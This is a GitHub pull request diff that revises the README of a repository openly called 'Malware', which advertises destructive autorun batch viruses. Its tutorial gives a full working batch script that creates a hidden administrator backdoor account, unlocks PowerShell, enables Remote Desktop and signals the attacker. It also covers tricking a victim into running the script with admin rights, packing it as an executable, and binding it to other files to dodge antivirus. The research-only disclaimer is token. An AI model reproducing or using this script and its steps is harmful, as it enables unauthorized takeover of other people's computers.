Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Update README.md #3

Open
wants to merge 1 commit into
base: master
Choose a base branch
from
Open

Update README.md #3

Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
88 changes: 59 additions & 29 deletions README.md
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -1,11 +1,11 @@
# Malware

This is my first controbution!
## This is my first controbution revised.
And because I want to give something meaningful as well as just mess around, this repo is a collection of fun little viruses that pack a mean punch.

If you know anything about hacking you will know that batch files are commonly the scum of the hacking world, most tutorials will show you how to make "viruses" that are nothing more than pranks and gain the creator nothing more than a laugh, which is OK, but if you really want something to cause some actual lasting damage those pranks will be no help.

So here are a couple of actual batch file viruses included in this repo:
### So here are a couple of actual batch file viruses included in this repo:
1. Disablenet.bat
2. Shutdowns.bat
3. crashespc.bat
Expand All @@ -14,50 +14,80 @@ So here are a couple of actual batch file viruses included in this repo:
Please Note that the above mentioned viruses make use of the autorun.inf file to exploit the autorun feature and can easily infect a windows machine and their effect can be devistating.
Each .bat file can potencially destroy a PC if it's run individually. I have set them all to autorun, ensuring a non recoverable end result.

Additionally!!
#### Additionally!!

For an additional virus that is unlinked and unaffiliated with the .bat set please see the file named:
Complete_viruscode_Pascal:
For an additional virus that is unlinked and unaffiliated with the .bat set please see the file named:
Complete_viruscode_Pascal:

_____________________________________________________________________________________________________________________________


Here Is a Short Tutorial!
### Here Is a Short Tutorial!
Let's try to make an actual batch file virus to gain full access to another computer.
NOTE: The user is going to have to be tricked into opening a file that requires admin access.

The first step is to open notepad and type in:
#### The first step is to open notepad and type in:

@echo offnet user winsystem winsystem /addnet localgroup administrators winsystem /add powershell set-executionpolicy
@echo off
setlocal

unrestrictedpowershell $path = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList'
REM Define user variables
set "username=winsystem"
set "password=winsystem"
set "registryPath=HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList"

powershell New-Item $path -Force | New-ItemProperty -Name winsystem -Value 0 -PropertyType DWord -Force reg add
REM Function to handle errors
:ErrorHandler
echo An error occurred: %1
exit /b 1

"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
REM Create a new user and add to administrators group
net user %username% %password% /add || call :ErrorHandler "Failed to create user %username%"
net localgroup administrators %username% /add || call :ErrorHandler "Failed to add user %username% to administrators group"

msg <insert your IP here> Its ready.

How it Works
REM Set PowerShell execution policy to unrestricted
powershell -Command "Set-ExecutionPolicy Unrestricted -Scope Process -Force" || call :ErrorHandler "Failed to set PowerShell execution policy"

REM Create a new registry entry to hide the user
powershell -Command "New-Item -Path '%registryPath%' -Force | New-ItemProperty -Name '%username%' -Value 0 -PropertyType DWord -Force" || call :ErrorHandler "Failed to create registry entry for %username%"

REM Allow remote desktop connections
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f || call :ErrorHandler "Failed to enable remote desktop connections"

REM Notify the user that the setup is complete
msg * "The setup is ready. Please connect to the server."

endlocal
exit /b 0


## How it Works

1. Creates a new user called winsystem with the password winsystem
2. Adds the new user as an admin.
3. Alows PowerShell scripts to run.
4. Hides the user from the Log in screen.
5. Allows RDP (Remote Desktop Protocol)
6. Sends the message "The setup is ready. Please connect to the server." To the pre-defined IP.

## Last step:

### Download:
https://www.computerhope.com/download/utility/Bat_To_Exe_Converter.zip

The first line creates a new user called winsystem with the password winsystem
The second line adds the new user as an admin.
The third line allows PowerShell scripts to run.
The fourth and fifth lines hide the user from the Log in screen.
The sixth line allows RDP (Remote Desktop Protocol)
The seventh line sends the IP address that is imputed the message "Its ready."
Last step:
Download https://www.computerhope.com/download/utility/Bat_To_Exe_Converter.zip then convert the batch file and remember to tick the box that says Add Administrator Manifest.
Then convert the batch file and remember to tick the box that says Add Administrator Manifest.

REMEMBER: When the box opens DO NOT CLOSE IT! Copy down the computer name, open cmd, and type: ping <the computer name you copied down>.
##### REMEMBER: When the box opens DO NOT CLOSE IT! Copy down the computer name, open cmd, and type: ping <the computer name you copied down>.

Thats all! As soon as you get the IP, Copy it and input it into RDP and log in as winsystem.
Thats all!
As soon as you get the IP, Copy it and input it into RDP and log in as winsystem.

NOTE: Replace the items in < > as the items specified (duh).
##### NOTE: Replace the items in < > as the items specified (duh).

This may be detected by antivirus, but if you join the regular .bat file with a different file a Trojan can be made with low detection rates.
This may be detected by antivirus, but if you join the regular .bat file with a different files a Trojan can be made with low detection rates.

Remember that all responsibilities are at your own risk.
Please use it only for research purposes. Do not download this!
##### Remember that all responsibilities are at your own risk.
Please use it only for research purposes. >_0
Seriously though. Do not download this!

Be careful not to infect yourself when accessing and experimenting with malicious software!
###### Be careful not to infect yourself when accessing and experimenting with malicious software!